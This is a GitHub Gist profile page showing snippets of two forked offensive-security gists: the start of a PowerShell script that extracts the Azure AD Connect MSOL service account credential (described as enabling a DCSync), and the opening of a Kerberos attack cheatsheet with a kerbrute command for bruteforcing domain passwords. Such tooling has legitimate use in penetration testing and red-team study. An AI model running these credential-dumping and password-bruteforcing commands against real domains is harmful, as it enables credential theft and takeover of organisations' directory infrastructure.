Skip to content

Instantly share code, notes, and snippets.

View sho-luv's full-sized avatar
🌀
In the matrix.

Leon Johnson sho-luv

🌀
In the matrix.
View GitHub Profile
@sho-luv
sho-luv / azuread_decrypt_msol_v2.ps1
Created December 16, 2021 21:59 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@sho-luv
sho-luv / kerberos_attacks_cheatsheet.md
Created December 9, 2021 14:29 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: